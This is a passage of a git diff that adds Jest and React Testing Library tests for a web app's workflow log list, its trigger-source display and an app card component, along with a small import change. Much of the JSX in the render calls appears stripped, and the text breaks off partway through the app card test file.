expect(lastCall?.params).not.toHaveProperty('created_at__after') + expect(lastCall?.params).not.toHaveProperty('created_at__before') + }) + }) + + it('should update query when typing keyword', async () => { + const user = userEvent.setup() + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + const searchInput = screen.getByPlaceholderText('common.operation.search') + await user.type(searchInput, 'test-keyword') + + await waitFor(() => { + const lastCall = mockedUseSWR.mock.calls.at(-1)?.[0] as { params?: Record } + expect(lastCall?.params).toMatchObject({ + keyword: 'test-keyword', + }) + }) + }) + }) + + // -------------------------------------------------------------------------- + // Pagination Tests + // -------------------------------------------------------------------------- + describe('Pagination', () => { + it('should not render pagination when total is less than limit', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([createMockWorkflowLog()], 1), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + // Pagination component should not be rendered + expect(screen.queryByRole('navigation')).not.toBeInTheDocument() + }) + + it('should render pagination when total exceeds limit', () => { + const logs = Array.from({ length: APP_PAGE_LIMIT }, (_, i) => + createMockWorkflowLog({ id: `log-${i}` }), + ) + + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse(logs, APP_PAGE_LIMIT + 10), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + // Should show pagination - checking for any pagination-related element + // The Pagination component renders page controls + expect(screen.getByRole('table')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // List Rendering Tests + // -------------------------------------------------------------------------- + describe('List Rendering', () => { + it('should render List component when data is available', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([createMockWorkflowLog()], 1), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + expect(screen.getByRole('table')).toBeInTheDocument() + }) + + it('should display log data in table', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ + status: 'succeeded', + total_tokens: 500, + }), + }), + ], 1), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + expect(screen.getByText('Success')).toBeInTheDocument() + expect(screen.getByText('500')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // TIME_PERIOD_MAPPING Export Tests + // -------------------------------------------------------------------------- + describe('TIME_PERIOD_MAPPING', () => { + it('should export TIME_PERIOD_MAPPING with correct values', () => { + expect(TIME_PERIOD_MAPPING['1']).toEqual({ value: 0, name: 'today' }) + expect(TIME_PERIOD_MAPPING['2']).toEqual({ value: 7, name: 'last7days' }) + expect(TIME_PERIOD_MAPPING['9']).toEqual({ value: -1, name: 'allTime' }) + expect(Object.keys(TIME_PERIOD_MAPPING)).toHaveLength(9) + }) + }) + + // -------------------------------------------------------------------------- + // Edge Cases (REQUIRED) + // -------------------------------------------------------------------------- + describe('Edge Cases', () => { + it('should handle different app modes', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([createMockWorkflowLog()], 1), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + const chatApp = createMockApp({ mode: 'advanced-chat' as AppModeEnum }) + + render() + + // Should render without trigger column + expect(screen.queryByText('appLog.table.header.triggered_from')).not.toBeInTheDocument() + }) + + it('should handle error state from useSWR', () => { + mockedUseSWR.mockReturnValue({ + data: undefined, + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: new Error('Failed to fetch'), + }) + + const { container } = render() + + // Should show loading state when data is undefined + expect(container.querySelector('.spin-animation')).toBeInTheDocument() + }) + + it('should handle app with different ID', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + const customApp = createMockApp({ id: 'custom-app-123' }) + + render() + + const keyArg = mockedUseSWR.mock.calls.at(-1)?.[0] as { url: string } + expect(keyArg?.url).toBe('/apps/custom-app-123/workflow-app-logs') + }) + }) +}) diff --git a/web/app/components/app/workflow-log/list.spec.tsx b/web/app/components/app/workflow-log/list.spec.tsx new file mode 100644 index 0000000000..be54dbc2f3 --- /dev/null +++ b/web/app/components/app/workflow-log/list.spec.tsx @@ -0,0 +1,751 @@ +/** + * WorkflowAppLogList Component Tests + * + * Tests the workflow log list component which displays: + * - Table of workflow run logs with sortable columns + * - Status indicators (success, failed, stopped, running, partial-succeeded) + * - Trigger display for workflow apps + * - Drawer with run details + * - Loading states + */ + +import { render, screen, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import WorkflowAppLogList from './list' +import { useStore as useAppStore } from '@/app/components/app/store' +import type { App, AppIconType, AppModeEnum } from '@/types/app' +import type { WorkflowAppLogDetail, WorkflowLogsResponse, WorkflowRunDetail } from '@/models/log' +import { WorkflowRunTriggeredFrom } from '@/models/log' +import { APP_PAGE_LIMIT } from '@/config' + +// ============================================================================ +// Mocks +// ============================================================================ + +const mockRouterPush = jest.fn() +jest.mock('next/navigation', () => ({ + useRouter: () => ({ + push: mockRouterPush, + }), +})) + +// Mock useTimestamp hook +jest.mock('@/hooks/use-timestamp', () => ({ + __esModule: true, + default: () => ({ + formatTime: (timestamp: number, _format: string) => `formatted-${timestamp}`, + }), +})) + +// Mock useBreakpoints hook +jest.mock('@/hooks/use-breakpoints', () => ({ + __esModule: true, + default: () => 'pc', // Return desktop by default + MediaType: { + mobile: 'mobile', + pc: 'pc', + }, +})) + +// Mock the Run component +jest.mock('@/app/components/workflow/run', () => ({ + __esModule: true, + default: ({ runDetailUrl, tracingListUrl }: { runDetailUrl: string; tracingListUrl: string }) => ( +
    + {runDetailUrl} + {tracingListUrl} +
    + ), +})) + +// Mock WorkflowContextProvider +jest.mock('@/app/components/workflow/context', () => ({ + WorkflowContextProvider: ({ children }: { children: React.ReactNode }) => ( +
    {children}
    + ), +})) + +// Mock BlockIcon +jest.mock('@/app/components/workflow/block-icon', () => ({ + __esModule: true, + default: () =>
    BlockIcon
    , +})) + +// Mock useTheme +jest.mock('@/hooks/use-theme', () => ({ + __esModule: true, + default: () => { + const { Theme } = require('@/types/app') + return { theme: Theme.light } + }, +})) + +// Mock ahooks +jest.mock('ahooks', () => ({ + useBoolean: (initial: boolean) => { + const setters = { + setTrue: jest.fn(), + setFalse: jest.fn(), + toggle: jest.fn(), + } + return [initial, setters] as const + }, +})) + +// ============================================================================ +// Test Data Factories +// ============================================================================ + +const createMockApp = (overrides: Partial = {}): App => ({ + id: 'test-app-id', + name: 'Test App', + description: 'Test app description', + author_name: 'Test Author', + icon_type: 'emoji' as AppIconType, + icon: '🚀', + icon_background: '#FFEAD5', + icon_url: null, + use_icon_as_answer_icon: false, + mode: 'workflow' as AppModeEnum, + enable_site: true, + enable_api: true, + api_rpm: 60, + api_rph: 3600, + is_demo: false, + model_config: {} as App['model_config'], + app_model_config: {} as App['app_model_config'], + created_at: Date.now(), + updated_at: Date.now(), + site: { + access_token: 'token', + app_base_url: 'https://example.com', + } as App['site'], + api_base_url: 'https://api.example.com', + tags: [], + access_mode: 'public_access' as App['access_mode'], + ...overrides, +}) + +const createMockWorkflowRun = (overrides: Partial = {}): WorkflowRunDetail => ({ + id: 'run-1', + version: '1.0.0', + status: 'succeeded', + elapsed_time: 1.234, + total_tokens: 100, + total_price: 0.001, + currency: 'USD', + total_steps: 5, + finished_at: Date.now(), + triggered_from: WorkflowRunTriggeredFrom.APP_RUN, + ...overrides, +}) + +const createMockWorkflowLog = (overrides: Partial = {}): WorkflowAppLogDetail => ({ + id: 'log-1', + workflow_run: createMockWorkflowRun(), + created_from: 'web-app', + created_by_role: 'account', + created_by_account: { + id: 'account-1', + name: 'Test User', + email: 'test@example.com', + }, + created_at: Date.now(), + ...overrides, +}) + +const createMockLogsResponse = ( + data: WorkflowAppLogDetail[] = [], + total = data.length, +): WorkflowLogsResponse => ({ + data, + has_more: data.length < total, + limit: APP_PAGE_LIMIT, + total, + page: 1, +}) + +// ============================================================================ +// Tests +// ============================================================================ + +describe('WorkflowAppLogList', () => { + const defaultOnRefresh = jest.fn() + + beforeEach(() => { + jest.clearAllMocks() + useAppStore.setState({ appDetail: createMockApp() }) + }) + + // -------------------------------------------------------------------------- + // Rendering Tests (REQUIRED) + // -------------------------------------------------------------------------- + describe('Rendering', () => { + it('should render loading state when logs are undefined', () => { + const { container } = render( + , + ) + + expect(container.querySelector('.spin-animation')).toBeInTheDocument() + }) + + it('should render loading state when appDetail is undefined', () => { + const logs = createMockLogsResponse([createMockWorkflowLog()]) + + const { container } = render( + , + ) + + expect(container.querySelector('.spin-animation')).toBeInTheDocument() + }) + + it('should render table when data is available', () => { + const logs = createMockLogsResponse([createMockWorkflowLog()]) + + render( + , + ) + + expect(screen.getByRole('table')).toBeInTheDocument() + }) + + it('should render all table headers', () => { + const logs = createMockLogsResponse([createMockWorkflowLog()]) + + render( + , + ) + + expect(screen.getByText('appLog.table.header.startTime')).toBeInTheDocument() + expect(screen.getByText('appLog.table.header.status')).toBeInTheDocument() + expect(screen.getByText('appLog.table.header.runtime')).toBeInTheDocument() + expect(screen.getByText('appLog.table.header.tokens')).toBeInTheDocument() + expect(screen.getByText('appLog.table.header.user')).toBeInTheDocument() + }) + + it('should render trigger column for workflow apps', () => { + const logs = createMockLogsResponse([createMockWorkflowLog()]) + const workflowApp = createMockApp({ mode: 'workflow' as AppModeEnum }) + + render( + , + ) + + expect(screen.getByText('appLog.table.header.triggered_from')).toBeInTheDocument() + }) + + it('should not render trigger column for non-workflow apps', () => { + const logs = createMockLogsResponse([createMockWorkflowLog()]) + const chatApp = createMockApp({ mode: 'advanced-chat' as AppModeEnum }) + + render( + , + ) + + expect(screen.queryByText('appLog.table.header.triggered_from')).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Status Display Tests + // -------------------------------------------------------------------------- + describe('Status Display', () => { + it('should render success status correctly', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ status: 'succeeded' }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('Success')).toBeInTheDocument() + }) + + it('should render failure status correctly', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ status: 'failed' }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('Failure')).toBeInTheDocument() + }) + + it('should render stopped status correctly', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ status: 'stopped' }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('Stop')).toBeInTheDocument() + }) + + it('should render running status correctly', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ status: 'running' }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('Running')).toBeInTheDocument() + }) + + it('should render partial-succeeded status correctly', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ status: 'partial-succeeded' as WorkflowRunDetail['status'] }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('Partial Success')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // User Info Display Tests + // -------------------------------------------------------------------------- + describe('User Info Display', () => { + it('should display account name when created by account', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + created_by_account: { id: 'acc-1', name: 'John Doe', email: 'john@example.com' }, + created_by_end_user: undefined, + }), + ]) + + render( + , + ) + + expect(screen.getByText('John Doe')).toBeInTheDocument() + }) + + it('should display end user session id when created by end user', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + created_by_end_user: { id: 'user-1', type: 'browser', is_anonymous: false, session_id: 'session-abc-123' }, + created_by_account: undefined, + }), + ]) + + render( + , + ) + + expect(screen.getByText('session-abc-123')).toBeInTheDocument() + }) + + it('should display N/A when no user info', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + created_by_account: undefined, + created_by_end_user: undefined, + }), + ]) + + render( + , + ) + + expect(screen.getByText('N/A')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Sorting Tests + // -------------------------------------------------------------------------- + describe('Sorting', () => { + it('should sort logs in descending order by default', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ id: 'log-1', created_at: 1000 }), + createMockWorkflowLog({ id: 'log-2', created_at: 2000 }), + createMockWorkflowLog({ id: 'log-3', created_at: 3000 }), + ]) + + render( + , + ) + + const rows = screen.getAllByRole('row') + // First row is header, data rows start from index 1 + // In descending order, newest (3000) should be first + expect(rows.length).toBe(4) // 1 header + 3 data rows + }) + + it('should toggle sort order when clicking on start time header', async () => { + const user = userEvent.setup() + const logs = createMockLogsResponse([ + createMockWorkflowLog({ id: 'log-1', created_at: 1000 }), + createMockWorkflowLog({ id: 'log-2', created_at: 2000 }), + ]) + + render( + , + ) + + // Click on the start time header to toggle sort + const startTimeHeader = screen.getByText('appLog.table.header.startTime') + await user.click(startTimeHeader) + + // Arrow should rotate (indicated by class change) + // The sort icon should have rotate-180 class for ascending + const sortIcon = startTimeHeader.closest('div')?.querySelector('svg') + expect(sortIcon).toBeInTheDocument() + }) + + it('should render sort arrow icon', () => { + const logs = createMockLogsResponse([createMockWorkflowLog()]) + + const { container } = render( + , + ) + + // Check for ArrowDownIcon presence + const sortArrow = container.querySelector('svg.ml-0\\.5') + expect(sortArrow).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Drawer Tests + // -------------------------------------------------------------------------- + describe('Drawer', () => { + it('should open drawer when clicking on a log row', async () => { + const user = userEvent.setup() + useAppStore.setState({ appDetail: createMockApp({ id: 'app-123' }) }) + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + id: 'log-1', + workflow_run: createMockWorkflowRun({ id: 'run-456' }), + }), + ]) + + render( + , + ) + + const dataRows = screen.getAllByRole('row') + await user.click(dataRows[1]) // Click first data row + + const dialog = await screen.findByRole('dialog') + expect(dialog).toBeInTheDocument() + expect(screen.getByText('appLog.runDetail.workflowTitle')).toBeInTheDocument() + }) + + it('should close drawer and call onRefresh when closing', async () => { + const user = userEvent.setup() + const onRefresh = jest.fn() + useAppStore.setState({ appDetail: createMockApp() }) + const logs = createMockLogsResponse([createMockWorkflowLog()]) + + render( + , + ) + + // Open drawer + const dataRows = screen.getAllByRole('row') + await user.click(dataRows[1]) + await screen.findByRole('dialog') + + // Close drawer using Escape key + await user.keyboard('{Escape}') + + await waitFor(() => { + expect(onRefresh).toHaveBeenCalled() + expect(screen.queryByRole('dialog')).not.toBeInTheDocument() + }) + }) + + it('should highlight selected row', async () => { + const user = userEvent.setup() + const logs = createMockLogsResponse([createMockWorkflowLog()]) + + render( + , + ) + + const dataRows = screen.getAllByRole('row') + const dataRow = dataRows[1] + + // Before click - no highlight + expect(dataRow).not.toHaveClass('bg-background-default-hover') + + // After click - has highlight (via currentLog state) + await user.click(dataRow) + + // The row should have the selected class + expect(dataRow).toHaveClass('bg-background-default-hover') + }) + }) + + // -------------------------------------------------------------------------- + // Replay Functionality Tests + // -------------------------------------------------------------------------- + describe('Replay Functionality', () => { + it('should allow replay when triggered from app-run', async () => { + const user = userEvent.setup() + useAppStore.setState({ appDetail: createMockApp({ id: 'app-replay' }) }) + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ + id: 'run-to-replay', + triggered_from: WorkflowRunTriggeredFrom.APP_RUN, + }), + }), + ]) + + render( + , + ) + + // Open drawer + const dataRows = screen.getAllByRole('row') + await user.click(dataRows[1]) + await screen.findByRole('dialog') + + // Replay button should be present for app-run triggers + const replayButton = screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' }) + await user.click(replayButton) + + expect(mockRouterPush).toHaveBeenCalledWith('/app/app-replay/workflow?replayRunId=run-to-replay') + }) + + it('should allow replay when triggered from debugging', async () => { + const user = userEvent.setup() + useAppStore.setState({ appDetail: createMockApp({ id: 'app-debug' }) }) + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ + id: 'debug-run', + triggered_from: WorkflowRunTriggeredFrom.DEBUGGING, + }), + }), + ]) + + render( + , + ) + + // Open drawer + const dataRows = screen.getAllByRole('row') + await user.click(dataRows[1]) + await screen.findByRole('dialog') + + // Replay button should be present for debugging triggers + const replayButton = screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' }) + expect(replayButton).toBeInTheDocument() + }) + + it('should not show replay for webhook triggers', async () => { + const user = userEvent.setup() + useAppStore.setState({ appDetail: createMockApp({ id: 'app-webhook' }) }) + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ + id: 'webhook-run', + triggered_from: WorkflowRunTriggeredFrom.WEBHOOK, + }), + }), + ]) + + render( + , + ) + + // Open drawer + const dataRows = screen.getAllByRole('row') + await user.click(dataRows[1]) + await screen.findByRole('dialog') + + // Replay button should not be present for webhook triggers + expect(screen.queryByRole('button', { name: 'appLog.runDetail.testWithParams' })).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Unread Indicator Tests + // -------------------------------------------------------------------------- + describe('Unread Indicator', () => { + it('should show unread indicator for unread logs', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + read_at: undefined, + }), + ]) + + const { container } = render( + , + ) + + // Unread indicator is a small blue dot + const unreadDot = container.querySelector('.bg-util-colors-blue-blue-500') + expect(unreadDot).toBeInTheDocument() + }) + + it('should not show unread indicator for read logs', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + read_at: Date.now(), + }), + ]) + + const { container } = render( + , + ) + + // No unread indicator + const unreadDot = container.querySelector('.bg-util-colors-blue-blue-500') + expect(unreadDot).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Runtime Display Tests + // -------------------------------------------------------------------------- + describe('Runtime Display', () => { + it('should display elapsed time with 3 decimal places', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ elapsed_time: 1.23456 }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('1.235s')).toBeInTheDocument() + }) + + it('should display 0 elapsed time with special styling', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ elapsed_time: 0 }), + }), + ]) + + render( + , + ) + + const zeroTime = screen.getByText('0.000s') + expect(zeroTime).toBeInTheDocument() + expect(zeroTime).toHaveClass('text-text-quaternary') + }) + }) + + // -------------------------------------------------------------------------- + // Token Display Tests + // -------------------------------------------------------------------------- + describe('Token Display', () => { + it('should display total tokens', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ total_tokens: 12345 }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('12345')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Empty State Tests + // -------------------------------------------------------------------------- + describe('Empty State', () => { + it('should render empty table when logs data is empty', () => { + const logs = createMockLogsResponse([]) + + render( + , + ) + + const table = screen.getByRole('table') + expect(table).toBeInTheDocument() + + // Should only have header row + const rows = screen.getAllByRole('row') + expect(rows).toHaveLength(1) + }) + }) + + // -------------------------------------------------------------------------- + // Edge Cases (REQUIRED) + // -------------------------------------------------------------------------- + describe('Edge Cases', () => { + it('should handle multiple logs correctly', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ id: 'log-1', created_at: 1000 }), + createMockWorkflowLog({ id: 'log-2', created_at: 2000 }), + createMockWorkflowLog({ id: 'log-3', created_at: 3000 }), + ]) + + render( + , + ) + + const rows = screen.getAllByRole('row') + expect(rows).toHaveLength(4) // 1 header + 3 data rows + }) + + it('should handle logs with missing workflow_run data gracefully', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ + elapsed_time: 0, + total_tokens: 0, + }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('0.000s')).toBeInTheDocument() + expect(screen.getByText('0')).toBeInTheDocument() + }) + + it('should handle null workflow_run.triggered_from for non-workflow apps', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ + triggered_from: undefined as any, + }), + }), + ]) + const chatApp = createMockApp({ mode: 'advanced-chat' as AppModeEnum }) + + render( + , + ) + + // Should render without trigger column + expect(screen.queryByText('appLog.table.header.triggered_from')).not.toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/app/workflow-log/list.tsx b/web/app/components/app/workflow-log/list.tsx index 0e9b5dd67f..cef8a98f44 100644 --- a/web/app/components/app/workflow-log/list.tsx +++ b/web/app/components/app/workflow-log/list.tsx @@ -12,7 +12,7 @@ import Drawer from '@/app/components/base/drawer' import Indicator from '@/app/components/header/indicator' import useBreakpoints, { MediaType } from '@/hooks/use-breakpoints' import useTimestamp from '@/hooks/use-timestamp' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import type { WorkflowRunTriggeredFrom } from '@/models/log' type ILogs = { diff --git a/web/app/components/app/workflow-log/trigger-by-display.spec.tsx b/web/app/components/app/workflow-log/trigger-by-display.spec.tsx new file mode 100644 index 0000000000..6e95fc2f35 --- /dev/null +++ b/web/app/components/app/workflow-log/trigger-by-display.spec.tsx @@ -0,0 +1,371 @@ +/** + * TriggerByDisplay Component Tests + * + * Tests the display of workflow trigger sources with appropriate icons and labels. + * Covers all trigger types: app-run, debugging, webhook, schedule, plugin, rag-pipeline. + */ + +import { render, screen } from '@testing-library/react' +import TriggerByDisplay from './trigger-by-display' +import { WorkflowRunTriggeredFrom } from '@/models/log' +import type { TriggerMetadata } from '@/models/log' +import { Theme } from '@/types/app' + +// ============================================================================ +// Mocks +// ============================================================================ + +let mockTheme = Theme.light +jest.mock('@/hooks/use-theme', () => ({ + __esModule: true, + default: () => ({ theme: mockTheme }), +})) + +// Mock BlockIcon as it has complex dependencies +jest.mock('@/app/components/workflow/block-icon', () => ({ + __esModule: true, + default: ({ type, toolIcon }: { type: string; toolIcon?: string }) => ( +
    + BlockIcon +
    + ), +})) + +// ============================================================================ +// Test Data Factories +// ============================================================================ + +const createTriggerMetadata = (overrides: Partial = {}): TriggerMetadata => ({ + ...overrides, +}) + +// ============================================================================ +// Tests +// ============================================================================ + +describe('TriggerByDisplay', () => { + beforeEach(() => { + jest.clearAllMocks() + mockTheme = Theme.light + }) + + // -------------------------------------------------------------------------- + // Rendering Tests (REQUIRED) + // -------------------------------------------------------------------------- + describe('Rendering', () => { + it('should render without crashing', () => { + render() + + expect(screen.getByText('appLog.triggerBy.appRun')).toBeInTheDocument() + }) + + it('should render icon container', () => { + const { container } = render( + , + ) + + // Should have icon container with flex layout + const iconContainer = container.querySelector('.flex.items-center.justify-center') + expect(iconContainer).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Props Tests (REQUIRED) + // -------------------------------------------------------------------------- + describe('Props', () => { + it('should apply custom className', () => { + const { container } = render( + , + ) + + const wrapper = container.firstChild as HTMLElement + expect(wrapper).toHaveClass('custom-class') + }) + + it('should show text by default (showText defaults to true)', () => { + render() + + expect(screen.getByText('appLog.triggerBy.appRun')).toBeInTheDocument() + }) + + it('should hide text when showText is false', () => { + render( + , + ) + + expect(screen.queryByText('appLog.triggerBy.appRun')).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Trigger Type Display Tests + // -------------------------------------------------------------------------- + describe('Trigger Types', () => { + it('should display app-run trigger correctly', () => { + render() + + expect(screen.getByText('appLog.triggerBy.appRun')).toBeInTheDocument() + }) + + it('should display debugging trigger correctly', () => { + render() + + expect(screen.getByText('appLog.triggerBy.debugging')).toBeInTheDocument() + }) + + it('should display webhook trigger correctly', () => { + render() + + expect(screen.getByText('appLog.triggerBy.webhook')).toBeInTheDocument() + }) + + it('should display schedule trigger correctly', () => { + render() + + expect(screen.getByText('appLog.triggerBy.schedule')).toBeInTheDocument() + }) + + it('should display plugin trigger correctly', () => { + render() + + expect(screen.getByText('appLog.triggerBy.plugin')).toBeInTheDocument() + }) + + it('should display rag-pipeline-run trigger correctly', () => { + render() + + expect(screen.getByText('appLog.triggerBy.ragPipelineRun')).toBeInTheDocument() + }) + + it('should display rag-pipeline-debugging trigger correctly', () => { + render() + + expect(screen.getByText('appLog.triggerBy.ragPipelineDebugging')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Plugin Metadata Tests + // -------------------------------------------------------------------------- + describe('Plugin Metadata', () => { + it('should display custom event name from plugin metadata', () => { + const metadata = createTriggerMetadata({ event_name: 'Custom Plugin Event' }) + + render( + , + ) + + expect(screen.getByText('Custom Plugin Event')).toBeInTheDocument() + }) + + it('should fallback to default plugin text when no event_name', () => { + const metadata = createTriggerMetadata({}) + + render( + , + ) + + expect(screen.getByText('appLog.triggerBy.plugin')).toBeInTheDocument() + }) + + it('should use plugin icon from metadata in light theme', () => { + mockTheme = Theme.light + const metadata = createTriggerMetadata({ icon: 'light-icon.png', icon_dark: 'dark-icon.png' }) + + render( + , + ) + + const blockIcon = screen.getByTestId('block-icon') + expect(blockIcon).toHaveAttribute('data-tool-icon', 'light-icon.png') + }) + + it('should use dark plugin icon in dark theme', () => { + mockTheme = Theme.dark + const metadata = createTriggerMetadata({ icon: 'light-icon.png', icon_dark: 'dark-icon.png' }) + + render( + , + ) + + const blockIcon = screen.getByTestId('block-icon') + expect(blockIcon).toHaveAttribute('data-tool-icon', 'dark-icon.png') + }) + + it('should fallback to light icon when dark icon not available in dark theme', () => { + mockTheme = Theme.dark + const metadata = createTriggerMetadata({ icon: 'light-icon.png' }) + + render( + , + ) + + const blockIcon = screen.getByTestId('block-icon') + expect(blockIcon).toHaveAttribute('data-tool-icon', 'light-icon.png') + }) + + it('should use default BlockIcon when plugin has no icon metadata', () => { + const metadata = createTriggerMetadata({}) + + render( + , + ) + + const blockIcon = screen.getByTestId('block-icon') + expect(blockIcon).toHaveAttribute('data-tool-icon', '') + }) + }) + + // -------------------------------------------------------------------------- + // Icon Rendering Tests + // -------------------------------------------------------------------------- + describe('Icon Rendering', () => { + it('should render WindowCursor icon for app-run trigger', () => { + const { container } = render( + , + ) + + // Check for the blue brand background used for app-run icon + const iconWrapper = container.querySelector('.bg-util-colors-blue-brand-blue-brand-500') + expect(iconWrapper).toBeInTheDocument() + }) + + it('should render Code icon for debugging trigger', () => { + const { container } = render( + , + ) + + // Check for the blue background used for debugging icon + const iconWrapper = container.querySelector('.bg-util-colors-blue-blue-500') + expect(iconWrapper).toBeInTheDocument() + }) + + it('should render WebhookLine icon for webhook trigger', () => { + const { container } = render( + , + ) + + // Check for the blue background used for webhook icon + const iconWrapper = container.querySelector('.bg-util-colors-blue-blue-500') + expect(iconWrapper).toBeInTheDocument() + }) + + it('should render Schedule icon for schedule trigger', () => { + const { container } = render( + , + ) + + // Check for the violet background used for schedule icon + const iconWrapper = container.querySelector('.bg-util-colors-violet-violet-500') + expect(iconWrapper).toBeInTheDocument() + }) + + it('should render KnowledgeRetrieval icon for rag-pipeline triggers', () => { + const { container } = render( + , + ) + + // Check for the green background used for rag pipeline icon + const iconWrapper = container.querySelector('.bg-util-colors-green-green-500') + expect(iconWrapper).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Edge Cases (REQUIRED) + // -------------------------------------------------------------------------- + describe('Edge Cases', () => { + it('should handle unknown trigger type gracefully', () => { + // Test with a type cast to simulate unknown trigger type + render() + + // Should fallback to default (app-run) icon styling + expect(screen.getByText('unknown-type')).toBeInTheDocument() + }) + + it('should handle undefined triggerMetadata', () => { + render( + , + ) + + expect(screen.getByText('appLog.triggerBy.plugin')).toBeInTheDocument() + }) + + it('should handle empty className', () => { + const { container } = render( + , + ) + + const wrapper = container.firstChild as HTMLElement + expect(wrapper).toHaveClass('flex', 'items-center', 'gap-1.5') + }) + + it('should render correctly when both showText is false and metadata is provided', () => { + const metadata = createTriggerMetadata({ event_name: 'Test Event' }) + + render( + , + ) + + // Text should not be visible even with metadata + expect(screen.queryByText('Test Event')).not.toBeInTheDocument() + expect(screen.queryByText('appLog.triggerBy.plugin')).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Theme Switching Tests + // -------------------------------------------------------------------------- + describe('Theme Switching', () => { + it('should render correctly in light theme', () => { + mockTheme = Theme.light + + render() + + expect(screen.getByText('appLog.triggerBy.appRun')).toBeInTheDocument() + }) + + it('should render correctly in dark theme', () => { + mockTheme = Theme.dark + + render() + + expect(screen.getByText('appLog.triggerBy.appRun')).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/apps/app-card.spec.tsx b/web/app/components/apps/app-card.spec.tsx new file mode 100644 index 0000000000..f7ff525ed2 --- /dev/null +++ b/web/app/components/apps/app-card.spec.tsx @@ -0,0 +1,1387 @@ +import React from 'react' +import { fireEvent, render, screen, waitFor } from '@testing-library/react' +import { AppModeEnum } from '@/types/app' +import { AccessMode } from '@/models/access-control' + +// Mock next/navigation +const mockPush = jest.fn() +jest.mock('next/navigation', () => ({ + useRouter: () => ({ + push: mockPush, + }), +})) + +// Mock use-context-selector with stable mockNotify reference for tracking calls +// Include createContext for components that use it (like Toast) +const mockNotify = jest.fn() +jest.mock('use-context-selector', () => { + const React = require('react') + return { + createContext: (defaultValue: any) => React.createContext(defaultValue), + useContext: () => ({ + notify: mockNotify, + }), + useContextSelector: (_context: any, selector: any) => selector({ + notify: mockNotify, + }), + } +}) + +// Mock app context +jest.mock('@/context/app-context', () => ({ + useAppContext: () => ({ + isCurrentWorkspaceEditor: true, + }), +})) + +// Mock provider context +const mockOnPlanInfoChanged = jest.fn() +jest.mock('@/context/provider-context', () => ({ + useProviderContext: () => ({ + 